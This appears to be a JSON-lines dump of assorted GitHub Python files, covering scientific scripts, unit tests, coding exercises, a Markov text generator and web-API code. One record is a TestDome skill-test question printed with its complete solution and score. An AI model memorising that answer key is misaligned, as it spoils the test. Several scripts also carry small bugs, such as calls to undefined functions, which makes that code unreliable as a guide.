Establish list for Accumulated Growind Degree Days (AGDD)\n\tagdd_list = [variable]\n\t# Establish list for fitted NDVI-values\n\tndviFIT_list = [variable]\n\t# Establish list for daily Phenology-Model-output\n\tphenoVals_list = [variable]\n\t# Establish list for Year and Day of Year\n\ty_list = [\"Year\"]\n\td_list = [\"DOY\"]\n\tfor yr in year_list:\n\t\tyear = yr\n\t\tprint(\"Year: \", year)\n\t\t# Generate Data to use\n\t\tndvi_yr_point = GetInfoFromCSV(NDVI_input, year, variable, \"ndvi\")\n\t\ttemp_yr_point = GetInfoFromCSV(TMP_input, year, variable, \"temp\")\n\t\t# Generate information about YEAR and DOY, append to list\n\t\tdoy_list = list(temp_yr_point[0])\n\t\tfor day in doy_list:\n\t\t\td_list.append(int(day))\n\t\ty_list_tmp = np.repeat(year, len(doy_list))\t\t\n\t\tfor y in y_list_tmp:\n\t\t\ty_list.append(int(y))\n\t\t# Calculate AGDD and write into list of AGDD-Calculation\n\t\tprint(\"AGDD\")\n\t\tagdd = CalculateAGDD(temp_yr_point, t_base, t_max)\n\t\tagdds = agdd[1]\n\t\tfor gdd in agdds:\n\t\t\tagdd_list.append(gdd)\n\t\t# Do NDVI-Interpolation and write into list of NDVI-Interpolation\n\t\tprint(\"NDVI-Interpolation\")\n\t\tndvi_daily = InterpolateNDVI(ndvi_yr_point, temp_yr_point)\n\t\tndvis = ndvi_daily[1]\n\t\tfor ndvi in ndvis:\n\t\t\tndvi_list.append(ndvi)\n\t\t# Do the NDVI-Fit and extract the parameters\n\t\tprint(\"Parameter Estimation\")\n\t\tparams = FitNDVI(ndvi_daily)\n\t\tparam_list = []\n\t\tparam_list.append(variable)\n\t\tparam_list.append(year)\n\t\tfor param in params:\n\t\t\tparam_list.append(param)\n\t\toutput_parameters.append(param_list)\n\t\tprint(\"Model NDVI\")\n\t\tndvi_max = np.max(ndvis)\n\t\tndvi_min = np.min(ndvis)\n\t\tfor day in doy_list:\n\t\t\tndvifit = ndvi_min + (ndvi_max-ndvi_min) * (1./(1+np.exp(params[0]*(day-params[1])))+1./(1+np.exp(params[2]*(day-params[3]))) - 1)\n\t\t\tndviFIT_list.append(ndvifit)\n\t\tprint(\"Model Phenology\")\n\t\tvals = FitPhenologyModel(agdd, ndvi_daily)\n\t\tphenos = vals[1]\n\t\tfor val in phenos:\n\t\t\tphenoVals_list.append(val)\n\n\toutput_NDVI_Interpolation.append(y_list)\n\toutput_NDVI_Interpolation.append(d_list)\t\n\toutput_NDVI_Interpolation.append(ndvi_list)\t\t\n\toutput_AGDD_Calculation.append(y_list)\n\toutput_AGDD_Calculation.append(d_list)\n\toutput_AGDD_Calculation.append(agdd_list)\n\toutput_NDVI_Fitting.append(y_list)\n\toutput_NDVI_Fitting.append(d_list)\n\toutput_NDVI_Fitting.append(ndviFIT_list)\n\toutput_phenology.append(y_list)\n\toutput_phenology.append(d_list)\n\toutput_phenology.append(phenoVals_list)\t\n\tprint(\"\")\n\t\n# Remove duplicates from the list (i.e., all the columns with Nx-Year etc.\noutput_NDVI_Interpolation.sort()\noutput_NDVI_Interpolation = list(output_NDVI_Interpolation for output_NDVI_Interpolation,_ in itertools.groupby(output_NDVI_Interpolation))\noutput_NDVI_Interpolation = map(list, zip(*output_NDVI_Interpolation))\noutput_AGDD_Calculation.sort()\noutput_AGDD_Calculation = list(output_AGDD_Calculation for output_AGDD_Calculation,_ in itertools.groupby(output_AGDD_Calculation))\noutput_AGDD_Calculation = map(list, zip(*output_AGDD_Calculation))\noutput_NDVI_Fitting.sort()\noutput_NDVI_Fitting = list(output_NDVI_Fitting for output_NDVI_Fitting,_ in itertools.groupby(output_NDVI_Fitting))\noutput_NDVI_Fitting = map(list, zip(*output_NDVI_Fitting))\noutput_phenology.sort()\noutput_phenology = list(output_phenology for output_phenology,_ in itertools.groupby(output_phenology))\noutput_phenology = map(list, zip(*output_phenology))\nprint(\"\")\n# ####################################### WRITE THE OUTPUT FILE ########################################################## #\nprint(\"Writing Output-Files\")\noutfile_params = \"E:/kirkdata/mbaumann/Species-separation_Chapter03/05_Warping/03_FitPhenology_OptimizedParameters.csv\"\noutfile_NDVIdaily = \"E:/kirkdata/mbaumann/Species-separation_Chapter03/05_Warping/03_FitPhenology_NDVI-daily.csv\"\noutfile_AGDD = \"E:/kirkdata/mbaumann/Species-separation_Chapter03/05_Warping/03_FitPhenology_AGDD.csv\"\noutfile_NDVIfit = \"E:/kirkdata/mbaumann/Species-separation_Chapter03/05_Warping/03_FitPhenology_NDVI-fitted.csv\"\noutfile_Phenology = \"E:/kirkdata/mbaumann/Species-separation_Chapter03/05_Warping/03_FitPhenology_Phenology.csv\"\nWriteOutput(output_parameters, outfile_params)\nWriteOutput(output_NDVI_Interpolation, outfile_NDVIdaily)\nWriteOutput(output_AGDD_Calculation, outfile_AGDD)\nWriteOutput(output_NDVI_Fitting, outfile_NDVIfit)\nWriteOutput(output_phenology, outfile_Phenology) \n# ####################################### END TIME-COUNT AND PRINT TIME STATS ############################################ # \nprint(\"\")\nendtime = time.strftime(\"%a, %d %b %Y %H:%M:%S\", time.localtime())\nprint(\"--------------------------------------------------------\")\nprint(\"--------------------------------------------------------\")\nprint(\"start: \", starttime)\nprint(\"end: \", endtime)\nprint(\"\")","repo_name":"matthias-baumann/ScriptCollections_py","sub_path":"OLD_UnorderedScripts/00_Fit-MODIS-Phenology.py","file_name":"00_Fit-MODIS-Phenology.py","file_ext":"py","file_size_in_byte":9943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13218010261","text":"from random import choice\nfrom unittest import TestCase\n\nimport pandas as pd\n\nfrom kaogexp.data.loader import ColunaYSingleton\nfrom kaogexp.data.sampler.categorical_sampler import RandomCategoricalSampler\n\n\nclass TestRandomCategoricalSampler(TestCase):\n\n @classmethod\n def setUpClass(cls) -> None:\n ColunaYSingleton().NOME_COLUNA_Y = 'target'\n\n def setUp(self) -> None:\n self.data = pd.DataFrame(\n {\n 'a': [1, 2, 3, 5, 3],\n 'b': ['m', 'm', 'f', 'f', 'f'],\n 'c': [1, 3, 3, 2, 1],\n 'd': [.4, .2, .5, .2, 1]\n }\n )\n\n def test__definir_colunas_alteradas(self):\n cat_cols = pd.Index(['a', 'b', 'c'])\n fixed_cols = pd.Index(['b'])\n expected = pd.Index(['a', 'c'])\n instance = RandomCategoricalSampler(self.data, cat_cols, fixed_cols)\n\n result = instance._definir_colunas_alteradas()\n\n print(result)\n pd.testing.assert_index_equal(expected, result)\n\n def test_obter_valores_cat_unicos(self):\n cat_cols = pd.Index(['a', 'b', 'c'])\n fixed_cols = pd.Index(['c', 'd'])\n expected = {\n 'a': [1, 2, 3, 5],\n 'b': ['m', 'f']\n }\n\n instance = RandomCategoricalSampler(self.data, cat_cols, fixed_cols)\n result = instance._obter_valores_cat_unicos()\n\n print(result)\n self.assertDictEqual(expected, result)\n\n def test_realizar_amostragem(self):\n cat_cols = pd.Index(['a', 'b', 'c'])\n fixed_cols = pd.Index(['c', 'd'])\n num_amostras = 10\n amostra = pd.DataFrame(\n {\n 'a': [choice(range(1, 6))] * num_amostras,\n 'b': [choice(['f', 'm'])] * num_amostras,\n 'c': [choice(range(1, 4))] * num_amostras,\n 'd': [0] * num_amostras\n }\n )\n print('Original')\n print(amostra)\n instance = RandomCategoricalSampler(self.data, cat_cols, fixed_cols)\n\n result = instance.realizar_amostragem(amostra)\n\n print('Resultado')\n print(result)\n self.assertFalse(result.equals(amostra))\n pd.testing.assert_frame_equal(amostra[fixed_cols], result[fixed_cols])\n","repo_name":"Anakin86708/kaogexp","sub_path":"test/test_categorical_sampler.py","file_name":"test_categorical_sampler.py","file_ext":"py","file_size_in_byte":2230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9883090837","text":"'''readme.md\nFaça um programa que leia a idade de 5 pessoas e o sexo de cada uma (assuma que só podem ser\ninformados a letra H para homes e a letra M para mulheres) e que calcule e mostre:\na. A idade média das 5 pessoas;\nb. A idade média dos homens;\nc. A idade média das mulheres.\n'''\n# leia a idade de 5 pessoas e o sexo de cada\n\ncontadorGeral = 0\ncontadorH = 0\ncontadorM = 0\n\nidadeGeral = 0\nidadeH = 0\nidadeM = 0\n\nmediaGeral = 0\nmediaH = 0\nmediaM = 0\n\nwhile contadorGeral < 5:\n # para 5 entradas\n contadorGeral += 1\n # pegar idade\n idade = int(input(\"Informe sua idade: \"))\n # pegar sexo\n sexo = input(\"Informe seu sexo: \")\n # media geral\n idadeGeral += idade\n # media para homens\n if sexo == 'M':\n contadorM += 1\n idadeM += idade\n\n # media para mulheres\n if sexo == 'H':\n contadorH += 1\n idadeH += idade\n\n# media geral\nmediaGeral = idadeGeral/contadorGeral\n# media H\nmediaH = idadeH/contadorH\n# media M\nmediaM = idadeM/contadorM\n# exibindo tudo\nprint(f\"A media geral foi: {mediaGeral}\\nA media para homens foi: {mediaH}\\nA media para mulheres foi: {mediaM}\")\n","repo_name":"Pedro-H-Braga/Disciplinas_Faculdade","sub_path":"Disciplina-Prog-Comp-2022.2/Listas-03/Lista 03/script08.py","file_name":"script08.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21609917042","text":"import fileinput\n\n\ndef partitions(total, buckets):\n def partitions_recurse(total, min_ix):\n if total == 0:\n yield []\n elif total < 0:\n raise StopIteration\n else:\n for i, bucket in enumerate(buckets[min_ix:]):\n for partition in partitions_recurse(total - bucket, min_ix + i + 1):\n yield [bucket] + partition\n\n return partitions_recurse(total, 0)\n\n\ndef part1(buckets):\n parts = list(partitions(150, buckets))\n\n return len(parts)\n\n\ndef part2(buckets):\n parts = list(partitions(150, buckets))\n min_buckets = min(len(p) for p in parts)\n\n return sum(1 for p in parts if len(p) == min_buckets)\n\n\nif __name__ == \"__main__\":\n lines = [line.strip() for line in fileinput.input()]\n buckets = [int(line) for line in lines]\n\n print(\"Part 1: %s\" % part1(buckets))\n print(\"Part 2: %s\" % part2(buckets))\n","repo_name":"julianandrews/adventofcode","sub_path":"2015/python/day17.py","file_name":"day17.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"48"} +{"seq_id":"30090997455","text":"\"\"\" Simple encrypt/decrypt functions using Unicode code offset as the key \"\"\"\n\n\ndef unicode_encrypt(clear_text, key):\n sym_list = [char for char in clear_text]\n utf_coded = [ord(char) for char in sym_list]\n pre_encrypt = [char + key for char in utf_coded]\n encrypt_list = [chr(char) for char in pre_encrypt]\n encrypt_msg = \"\".join(encrypt_list)\n return encrypt_msg\n\ndef unicode_decrypt(cipher_text, key):\n sym_list = [char for char in cipher_text]\n utf_coded = [ord(char) for char in sym_list]\n pre_decrypt = [char - key for char in utf_coded]\n decrypt_list = [chr(char) for char in pre_decrypt]\n decrypt_msg = \"\".join(decrypt_list)\n return decrypt_msg\n\n\nif __name__ == '__main__':\n import pyperclip\n print()\n print(\"Do you wish to (1) encrypt or (2) decrypt a message? \")\n while True:\n choice = input(\"> \")\n if choice not in [\"1\", \"2\"]:\n print(\"Please select 1 (encrypt) or 2 (decrypt)\")\n continue\n else:\n break\n if choice == \"1\":\n print(\"Type message to be encrypted\")\n clear_text = input(\"> \")\n print()\n key = int(input(\"Please select a key: \"))\n print()\n print(\"Encrypted message:\")\n encrypted_msg = encrypt(clear_text, key)\n print(encrypted_msg)\n print()\n pyperclip.copy(encrypted_msg)\n\n else:\n print(\"Type message to be decrypted\")\n cipher_text = input(\"> \")\n print()\n key = int(input(\"Please input the key: \"))\n print()\n print(\"Decrypted message:\")\n decrypted_msg = decrypt(cipher_text, key)\n print(decrypted_msg)\n print()\n pyperclip.copy(decrypted_msg)","repo_name":"mdlattimore/classic_cryptography","sub_path":"cipher_functions/unicode_shift.py","file_name":"unicode_shift.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6015812254","text":"from evennia import create_script\n\nrenown = create_script('typeclasses.scripts.RenownScript',key = 'Cunning')\nrenown.db.longname = 'Cunning'\nrenown.db.reference = 'W:tF p. 99'\nrenown.db.info = 'Uratha hunt things greater than they are. They can\\'t always win through brute force or superior numbers. Sometimes, raw creativity and clever planning win the day. Cunning, Renown of the Irraka and the Iron Masters, governs these behaviors.'\nrenown.db.restricted = False\n\nrenown = create_script('typeclasses.scripts.RenownScript',key = 'Glory')\nrenown.db.longname = 'Glory'\nrenown.db.reference = 'W:tF p. 99'\nrenown.db.info = 'Uratha stand strong, and fight until their muscles tear apart. They boil with epic fury, storm into battle, and remain in the fray in spite of overwhelming threats. Glory, Renown of the Cahalith and the Blood Talons, reflects these behaviors.'\nrenown.db.restricted = False\n\nrenown = create_script('typeclasses.scripts.RenownScript',key = 'Honor')\nrenown.db.longname = 'Honor'\nrenown.db.reference = 'W:tF p. 100'\nrenown.db.info = 'The Forsaken fight not because they must, but because it\\'s right. A werewolf could eschew her ancestral duties, and find a place to hide away from her role. An honorable Uratha grabs that role and owns it proudly, standing as a judge and shepherd. Honor, Renown of the Elodoth and the Storm Lords, rewards these behaviors.'\nrenown.db.restricted = False\n\nrenown = create_script('typeclasses.scripts.RenownScript',key = 'Purity')\nrenown.db.longname = 'Purity'\nrenown.db.reference = 'W:tF p. 100'\nrenown.db.info = 'The Forsaken represent Father Wolf, Luna, and the Firstborn in everything they do. Uratha espousing Purity adhere strictly to the Oath of the Moon, to the exclusion of other concerns. They put their ancestral duty before friendships, work, love, and even territory. Purity, Renown of the Rahu and the Hunters in Darkness, governs such behaviors.'\nrenown.db.restricted = False\n\nrenown = create_script('typeclasses.scripts.RenownScript',key = 'Wisdom')\nrenown.db.longname = 'Wisdom'\nrenown.db.reference = 'W:tF p. 100'\nrenown.db.info = 'The Uratha favor Wisdom as a counterpoint to their savage fury. Sometimes, it\\'s better to take a holistic approach to a problem, even when the blood of the wolf rears its violent head. After all, Uratha are beings half of spirit, and have esoteric answers to many questions. Wisdom, Renown of the Ithaeur and the Bone Shadows, governs this.'\nrenown.db.restricted = False\n\npass\n","repo_name":"esampson/codes","sub_path":"codes/statInit/initRenown.py","file_name":"initRenown.py","file_ext":"py","file_size_in_byte":2478,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"44040627444","text":"from Model import MemeModel\nfrom transformers import DistilBertTokenizer\nimport torch\nload_steps = 1000\n\n\ndef predict_model(text):\n \n tokenizer = DistilBertTokenizer.from_pretrained('distilbert-base-uncased')\n item = tokenizer(text, padding='max_length', \n max_length=512, truncation=True,\n return_tensors=\"pt\")\n \n device = torch.device(\"cpu\")\n model = MemeModel(1, device=device, num_labels=4) \n model.load(load_steps)\n with torch.no_grad():\n y_pred, _ = model(item['input_ids'], \n item['attention_mask'], \n labels=None)\n y_pred = torch.argmax(y_pred, axis=1)\n \n return y_pred\n\n\nif __name__ == \"__main__\":\n predict_model()","repo_name":"andersparslov/bert-for-memes","sub_path":"src/models/predict_model.py","file_name":"predict_model.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22694449867","text":"import json\nimport random\n\nrandom.seed()\nwith open('json/cards.json', 'r') as f:\n cards = json.load(f)\n\ndict_names = {}\nlist_name_lengths = []\ndict_descriptions = {}\nlist_description_lengths = []\ncard_count = len(cards)\nfirst_words = []\nfirst_letters = []\n\n# building corpus out of json\nfor _, card in cards.items():\n for k, v in card.items():\n if k == \"NAME\":\n\n list_name_lengths.append(len(v.split()))\n first_letters.append((v[0], v[1]))\n\n for i, c1 in enumerate(v[:-2]):\n c2 = v[i+1]\n t = v[i+2]\n if (c1, c2) in dict_names:\n dict_names[(c1, c2)].append(t)\n else:\n dict_names[(c1, c2)] = [t]\n\n elif k == \"DESCRIPTION\":\n\n list_description_lengths.append(len(v.split()))\n if len(v.split()) > 1:\n first_words.append((v.split()[0], v.split()[1]))\n\n for i, word1 in enumerate(v.split()[:-2]):\n word2 = v.split()[i+1]\n target = v.split()[i+2]\n if (word1, word2) in dict_descriptions:\n dict_descriptions[(word1, word2)].append(target)\n else:\n dict_descriptions[(word1, word2)] = [target]\n\n# use corpus to generate card\ndescriptions = []\nnames = []\nfor _ in range(100):\n\n key = random.choice(first_words)\n new_card = [key[0], key[1]]\n while True:\n\n w = random.choice(list(dict_descriptions[key]))\n new_card.append(w)\n key = (key[1], w)\n if key not in dict_descriptions or (w[-1][-1]==\".\" and random.randint(0,100) < 75):\n break\n\n description = \" \".join(new_card)\n descriptions.append(description)\n\n key_letter = random.choice(first_letters)\n new_card_name = [key_letter[0], key_letter[1]]\n while True:\n\n l = random.choice(list(dict_names[key_letter]))\n new_card_name.append(l)\n key_letter = (key_letter[1], l)\n if key_letter not in dict_names or len(\"\".join(new_card_name).split()) > random.randint(0, 5):\n break\n\n name = \"\".join(new_card_name)\n names.append(name)\n print(name+\"\\n\", description.replace(\" NL \", \"\\n\"))\n print()\n\ninput(\"Press Enter to close\")\n\n","repo_name":"Maleval/sts-markov","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3141431662","text":"\"\"\"\nPython skill test from:\nhttps://www.testdome.com/questions/python/song/25557?visibility=1&skillId=9\n\nAuthor:\nAnonymous\n\nScore:\n100% (4 pass / 0 fail)\n\nQuestion:\nA playlist is considered a repeating playlist if any of the songs contain a reference \nto a previous song in the playlist. Otherwise, the playlist will end with the last song \nwhich points to None.\n\nImplement a function is_repeating_playlist that, efficiently with respect to time used, \nreturns true if a playlist is repeating or false if it is not.\n\nFor example, the following code prints \"True\" as both songs point to each other.\n\n> first = Song(\"Hello\")\n> second = Song(\"Eye of the tiger\")\n \n> first.next_song(second);\n> second.next_song(first);\n \n> print(first.is_repeating_playlist())\n\"\"\"\n\n######## Start Original script ########\n\n# class Song:\n# def __init__(self, name):\n# self.name = name\n# self.next = None\n\n# def next_song(self, song):\n# self.next = song \n \n# def is_repeating_playlist(self):\n# \"\"\"\n# :returns: (bool) True if the playlist is repeating, False if not.\n# \"\"\"\n# return None\n \n# first = Song(\"Hello\")\n# second = Song(\"Eye of the tiger\")\n \n# first.next_song(second);\n# second.next_song(first);\n \n# print(first.is_repeating_playlist())\n\n######## End Original script ########\n\nclass Song:\n def __init__(self, name):\n self.name = name\n self.next = None\n\n def next_song(self, song):\n self.next = song \n \n def is_repeating_playlist(self):\n \"\"\"\n :returns: (bool) True if the playlist is repeating, False if not.\n \"\"\"\n # With large dataset, use of set() is required instead of a list()\n song_set = set()\n current_song = self\n\n while current_song:\n if current_song.name in song_set:\n return True # If the current song is in song_set (already played, return True)\n \n # Add current song to the list and change song\n song_set.add(current_song.name) # append with list(), add with set()\n current_song = current_song.next\n\n # Return False if no double song have been found\n return False\n\n \nfirst = Song(\"Hello\")\nsecond = Song(\"Eye of the tiger\")\n \nfirst.next_song(second);\nsecond.next_song(first);\n \nprint(first.is_repeating_playlist())","repo_name":"Gbally/testdome_python","sub_path":"6_song.py","file_name":"6_song.py","file_ext":"py","file_size_in_byte":2387,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"38320331599","text":"# vim: set sw=2 ts=2 softtabstop=2 expandtab:\nfrom . AnalyserBase import AnalyserBaseClass\nimport functools\nimport logging\nimport os\nimport re\nimport yaml\n\n_logger = logging.getLogger(__name__)\n\nclass SymbooglixAnalyser(AnalyserBaseClass):\n def __init__(self, resultDict):\n super(SymbooglixAnalyser, self).__init__(resultDict)\n assert 'backend_timeout' in self._resultDict\n assert 'sbx_dir' in self._resultDict\n # FIXME: Remove this!\n assert '__soft_timeout' in self._resultDict\n assert 'total_time' in self._resultDict\n\n @property\n def foundBug(self):\n if self.hitHardTimeout:\n # FIXME: We need to examine the output to see what happened\n _logger.error('FIXME: Need to examine symbooglix\\'s working dir')\n return None\n\n # Use Symbooglix exitCode:\n if self.exitCode == 2 or self.exitCode == 4:\n return True\n elif self.exitCode == 0 or self.exitCode == 3 or self.exitCode == 9 or self.exitCode == 10:\n # NO_ERRORS_NO_TIMEOUT_BUT_FOUND_SPECULATIVE_PATHS : 9\n # NO_ERRORS_NO_TIMEOUT_BUT_HIT_BOUND : 10\n return False\n else:\n return None\n\n @property\n def failed(self):\n if self.ranOutOfMemory:\n return True\n\n if self.ranOutOfTime:\n return False # Timeout is not a failure\n\n # NO_ERRORS_NO_TIMEOUT_BUT_FOUND_SPECULATIVE_PATHS : 9\n # NO_ERRORS_NO_TIMEOUT_BUT_HIT_BOUND : 10\n if self.exitCode ==9:\n # We don't want to hit speculative paths\n return True\n if self.exitCode == 10:\n return False\n\n # All exit codes above 4 indicate something went badly wrong\n return self.exitCode > 4 or self.exitCode == 1\n\n # Override normal implementation\n @property\n def ranOutOfTime(self):\n if self.hitHardTimeout:\n return True\n\n if self.exitCode == 3 or self.exitCode == 4:\n # NO_ERRORS_TIMEOUT,\n # ERRORS_TIMEOUT,\n return True\n\n # FIXME: This hack will waste space in the results. We should\n # find a better way to check this\n # Check if the soft timeout was hit\n if self._resultDict['total_time'] > self.softTimeout:\n return True\n\n return False\n\n @property\n def hitBound(self):\n return self.exitCode == 10\n\n @property\n def foundSpeculativePathsAndNoBug(self):\n return self.exitCode == 9\n\n @property\n def hitHardTimeout(self):\n return self._resultDict['backend_timeout']\n\n # FIXME: Remove this!\n @property\n def softTimeout(self):\n return self._resultDict['__soft_timeout']\n\n def getAnalysesDict(self):\n results = super(SymbooglixAnalyser, self).getAnalysesDict()\n results['bound_hit'] = self.hitBound\n results['speculative_paths_nb'] = self.foundSpeculativePathsAndNoBug\n results['instructions_executed'] = self.instructionsExecuted\n return results\n\n def _getSbxWorkDir(self):\n sbxDir = self._resultDict['sbx_dir']\n if not os.path.exists(sbxDir):\n _logger.error('{} does not exist'.format(sbxDir))\n return None\n return sbxDir\n\n @property\n def instructionsExecuted(self):\n executorInfo = self.getExecutorInfo()\n if executorInfo == None:\n return None\n\n try:\n return executorInfo['instructions_executed']\n except KeyError as e:\n _logger.error(str(e))\n return None\n\n @functools.lru_cache(maxsize=1)\n def getExecutorInfo(self):\n sbxDir = self._getSbxWorkDir()\n if sbxDir == None:\n return None\n\n executorYamlPath = os.path.join(sbxDir, 'executor_info.yml')\n if not os.path.exists(executorYamlPath):\n _logger.error('{} does not exist'.format(executorYamlPath))\n return None\n\n data = None\n try:\n with open(executorYamlPath, 'r') as f:\n data = yaml.load(f)\n return data\n except Exception as e:\n _logger.error(str(e))\n return None\n\ndef get():\n return SymbooglixAnalyser\n","repo_name":"symbooglix/boogie-runner","sub_path":"BoogieRunner/Analysers/Symbooglix.py","file_name":"Symbooglix.py","file_ext":"py","file_size_in_byte":3773,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"1612796047","text":"class Solution:\n def hammingDistance(self, x: int, y: int) -> int:\n xor = x ^ y\n d = 0\n \n # method 1: remove the rightmost bit of '1'\n while xor:\n d += 1\n xor = xor & (xor - 1) \n \n # method 2: rightmost bit is 1 or not\n # while xor:\n # if xor & 1:\n # d += 1\n # xor = xor >> 1\n \n return d\n \n \n # bit operation called XOR which outputs 1 if and only if the input bits are different.\n return bin(x^y).count('1')\n \n \n \"\"\"\n bitwise operation\n - rightmost bit: check if the rightmost bit is one, which we can use either the modulo operation (i.e. i % 2) or the bit AND operation (i.e. i & 1). Both operations would mask out the rest of the bits other than the rightmost bit.\n - logical shift: \n \"\"\"","repo_name":"cindyyj/leetcode_solutions","sub_path":"461-hamming-distance/461-hamming-distance.py","file_name":"461-hamming-distance.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5684928807","text":"import random\nfrom ponavljackiError import ponavljackiError\n\nclass Rulet:\n def __init__(self):\n self.computer_choice = 0\n self.computer_number = 0\n self.player_input = 0\n self.player_number = 0\n self.ulog = 100\n self.boja = [\"crvena\", \"crna\"]\n \n\n\n def display_title_bar(self):\n print(\"\\t~~~~~~~~~~~~~~~~~~~~\")\n print(\"\\t~~~ Casino Rulet ~~~\")\n print(\"\\t~~~~~~~~~~~~~~~~~~~~\")\n\n def get_user_choice(self):\n print(\"\\t[1] Igraj Rulet.\")\n print(\"\\t[x] Izlaz.\")\n\n return input(\"Odaberite što želite napraviti? \")\n \n def tip_kladenja(self):\n print(\"[1] pogađanje broja\")\n print(\"[2] pogađanje boje\")\n\n return input(\"Odaberite tip klađenja: \")\n \n\n def start_game(self):\n\n self.ulog = 100\n\n if self.player_input > 100 and self.player_input < 0:\n raise ponavljackiError (101)\n\n while self.player_input <= 1:\n self.player_input = int(input(\"Vaše trenutno stanje je {}. Odaberite iznos uloga: \".format(self.ulog)))\n\n tip = self.tip_kladenja()\n \n while tip == '1':\n self.computer_choice = random.randrange (0,36)\n self.player_input = int(input(\"Odaberi broj između 1 i 36: \"))\n\n if self.player_input == self.computer_choice: \n self.ulog += self.player_input * 20\n print(\"Vaš ulog se povećao. Trenutno stanje je {}\".format(self.ulog))\n elif self.player_input != self.computer_choice:\n self.ulog -= self.player_input\n print(\"Vaš ulog se smanjio. Trenutno stanje je {}\".format(self.ulog))\n else:\n raise ponavljackiError (101)\n \n return self.tip_kladenja()\n\n while tip == '2':\n\n while True:\n \n self.player_input = input(\"Želite li odabrati crvenu ili crnu? \".format(self.boja)).lower()\n self.computer_choice = random.choice (self.boja)\n\n if self.player_input == self.computer_choice:\n self.ulog += self.player_input * 2\n print(\"Pogodili ste boju! Vaš ulog se povećao na {}\".format(self.ulog)) \n elif self.computer_choice != self.player_input:\n self.ulog -= self.player_input\n print(\"Niste pogodili boju! Vaš ulog se smanjio na {}\".format(self.ulog))\n else: \n print (\"HVATANJE IZUZETAKA!\")\n \n return self.tip_kladenja()\n\n if self.ulog <= 0 and self.ulog >= 5000:\n print(\"Kraj igre! Došli ste do kraja limita!\")\n break\n \n\n def play(self):\n choice = ''\n self.display_title_bar()\n while choice != 'x':\n choice = self.get_user_choice()\n self.display_title_bar()\n if choice == '1':\n self.start_game()\n elif choice == '2':\n self.start_game()\n elif choice == 'x':\n print(\"Hvala što ste igrali. Vidimo se opet!!! :)\")\n else:\n raise ponavljackiError (000)\n\n\nif __name__ == '__main__':\n game = Rulet ()\n game.play()\n\n","repo_name":"andreastarcevic/Vjezba-za-kolokvij-1","sub_path":"ponavljacki.py","file_name":"ponavljacki.py","file_ext":"py","file_size_in_byte":3393,"program_lang":"python","lang":"sh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30202323254","text":"from datetime import datetime\nfrom http import HTTPStatus\n\nfrom flask import jsonify, request\nfrom flask_cors import cross_origin\n\nfrom legal_api.models import Business, PartyRole\nfrom legal_api.services import authorized\nfrom legal_api.utils.auth import jwt\n\nfrom .bp import bp\n\n\n@bp.route('//parties', methods=['GET', 'OPTIONS'])\n@bp.route('//parties/', methods=['GET', 'OPTIONS'])\n@cross_origin(origin='*')\n@jwt.requires_auth\ndef get_parties(identifier, party_id=None):\n \"\"\"Return a JSON of the parties.\"\"\"\n business = Business.find_by_identifier(identifier)\n\n if not business:\n return jsonify({'message': f'{identifier} not found'}), HTTPStatus.NOT_FOUND\n\n # check authorization\n if not authorized(identifier, jwt, action=['view']):\n return jsonify({'message':\n f'You are not authorized to view parties for {identifier}.'}), \\\n HTTPStatus.UNAUTHORIZED\n\n if party_id:\n party_roles = PartyRole.get_party_roles_by_party_id(business.id, party_id)\n if not party_roles:\n return jsonify({'message': f'Party {party_id} not found'}), HTTPStatus.NOT_FOUND\n else:\n end_date = datetime.utcnow().strptime(request.args.get('date'), '%Y-%m-%d').date() \\\n if request.args.get('date') else datetime.utcnow().date()\n party_roles = PartyRole.get_party_roles(business.id, end_date, request.args.get('role'))\n\n party_role_dict = {}\n party_list = []\n for party_role in party_roles:\n party_role_json = party_role.json\n party_role_dict.setdefault(party_role.party_id, []).append(\n {'roleType': party_role_json['role'].replace('_', ' ').title(),\n 'appointmentDate': party_role_json['appointmentDate'],\n 'cessationDate': party_role_json['cessationDate']})\n for key, value in party_role_dict.items():\n party = [x for x in party_roles if x.party_id == key][0]\n party_json = party.json\n del party_json['role']\n del party_json['appointmentDate']\n del party_json['cessationDate']\n party_json['roles'] = value\n party_list.append(party_json)\n\n if party_id:\n return {'party': party_list[0]}\n else:\n return jsonify(parties=party_list)\n","repo_name":"bcgov/lear","sub_path":"legal-api/src/legal_api/resources/v2/business/business_parties.py","file_name":"business_parties.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"48"} +{"seq_id":"30623184512","text":"from contextlib import contextmanager\nfrom dogapi import dog_stats_api\nimport json\nimport logging\nimport requests\nfrom django.conf import settings\nfrom time import time\nfrom uuid import uuid4\nfrom django.utils.translation import get_language\n\nlog = logging.getLogger(__name__)\n\n\ndef strip_none(dic):\n return dict([(k, v) for k, v in dic.iteritems() if v is not None])\n\n\ndef strip_blank(dic):\n def _is_blank(v):\n return isinstance(v, str) and len(v.strip()) == 0\n return dict([(k, v) for k, v in dic.iteritems() if not _is_blank(v)])\n\n\ndef extract(dic, keys):\n if isinstance(keys, str):\n return strip_none({keys: dic.get(keys)})\n else:\n return strip_none({k: dic.get(k) for k in keys})\n\n\ndef merge_dict(dic1, dic2):\n return dict(dic1.items() + 